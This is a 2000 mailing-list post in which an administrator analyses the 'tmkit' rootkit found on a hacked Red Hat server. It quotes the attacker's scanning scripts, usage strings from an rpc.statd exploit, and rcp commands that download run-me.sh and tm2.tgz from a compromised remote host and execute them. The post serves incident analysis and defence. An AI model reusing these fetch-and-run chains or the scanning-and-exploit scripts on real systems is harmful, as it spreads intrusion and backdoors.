Security Incidents mailing list archives
^Madereet (or tmkit)
From: Kristinn Torfason <kritor () MOBILESTOP COM>
Date: Wed, 1 Nov 2000 18:32:54 -0000
This concerns what seems to go by the name ^Madereet (or maybe more properly 'tmkit'). Around October 23rd my site, which was running an old Rh 6.0 installation, got hacked. I don't know which hole the hacker used to break in but here is some information on what he left behind, and how I noticed my systems had been compromized. I noticed when issuing a ps command that it did not produce results in the format I expected. A quick search for ps produced a copy in /dev/^Madereet/.backup at which point I disconnected the network cable after issuing who, last, a history command and looking at some of my logs. Only the logs provided some clues to what seemed to have been a portscan. After examining the bogus ps binary I decided to try running the one in the /dev/^Madereet/.backup directory. That one seemed to be the original one, for it produced the format I am used to seeing and also showed me a process 'synscan' running, which I regretfully killed immetiately. I should have attemted to examine if this thingy had any connections going. The /dev/^Madereet directory contained a '.backup' directory and a 'other' directory. The '.backup' diectory contained the files inetd, inetd.conf, netstat, and ps which seemed to be backups of the original (normal) ones. The 'other' directory contained the following files : 28.done: ASCII text autohax: ELF 32-bit LSB executable start.pl: perl commands text statd: ELF 32-bit LSB executable synscan: ELF 32-bit LSB executable do.sh: Bourne shell script text The '28.done' file contained one line-feed character. The 'start.pl' file contained the following : #!/usr/bin/perl $random = int( rand(230)) + 4; system("./synscan '$random' '$random.statd' eth0 100 111"); system("./do.sh '$random'"); The 'do.sh' file contained the following : #!/bin/sh cat $1.statd | grep statd > $1.new rm $1.statd cat $1.new | cut -f1 -d'(' >$1.done rm $1.new nohup ./autohax $1.done & A closer examiniation of the contents of the files left in /dev/^Madereet/other directory led to some further information. An examination of the 'statd' binary there, simply using vi, disclosed the following text : statdx by ron1n shellcode () hotmail com Usage: %s [-t] [-p port] [-a addr] [-l len] [-o offset] [-w num] [-s secs] [-d type] <target> -t attack a tcp dispatcher [udp] [-o offset] [-w num] [-s secs] [-d type] <target> -t attack a tcp dispatcher [udp] -p rpc.statd serves requests on <port> [query] -a the stack address of the buffer is <addr> -l the length of the buffer is <len> [1024] -o the offset to return to is <offset> [600] -w the number of dwords to wipe is <num> [9] -s set timeout in seconds to <secs> [5] -d use a hardcoded <type> Available types: %d %s This was followed by something quite interesting (I've replaced the actual IP with x's and the user name with fubar) : rcp fubar () xxx xxx xx xx:/dev/ptyp/run-me.sh ./;chmod +x run-me.sh;nohup ./run-me.sh & .. and then by the following text : OMG! You now have rpc.statd technique! The hardcoded rcp command immediately caught my attention, so I hooked up the network cable again and gave it a spin : rcp fubar () xxx xxx xx xx:/dev/ptyp/run-me.sh ./ .. which indeed got me a file called 'run-me.sh' which contained : #!/bin/sh rcp fubar () xxx xxx xx xx:/dev/ptyp/tm2.tgz ./;tar xzvf tm2.tgz;cd tm2 ./setup .. so I continued and did : rcp fubar () xxx xxx xx xx:/dev/ptyp/tm2.tgz ./ .. which got me the file 'tm2.tgz'. This turnes out to contain a base package similar to the one the hacker installed on my machine. The machine hosting the 'fubar' account is a Solaris machine in Canada, and I think that machine has been hacked, and now seems to serve as some kind of platform for the hacker(s). The 'fubar' account on that machine seems to be wide open for rcp at least (planted .rhosts file?). At this point, I have upgraded my gateway machine and shut all ports except 22 and 80, and continue examining the 'tm2.tgz' package more closely. A first preliminary examination of the package shows that it creates/modifies/exchanges the following files : /etc/inetd.conf, /usr/sbin/time, /bin/lpr, /bin/ps, /bin/netstat, /usr/sbin/inetd, /bin/ls, /var/log/secure, /var/log/messages, /sbin/rpc.statd, /dev/hdbp, /dev/hdaq, /dev/^Madereet, /dev/^Madereet/.backup, /dev/^Madereet/other, /var/named/ADMROCKS. I would appreciate any comments, suggestions or feedback. Best regards, Kristinn Torfason quirc () quirc com
Current thread:
- ^Madereet (or tmkit) Kristinn Torfason (Nov 05)
- Re: ^Madereet (or tmkit) Opus (Nov 06)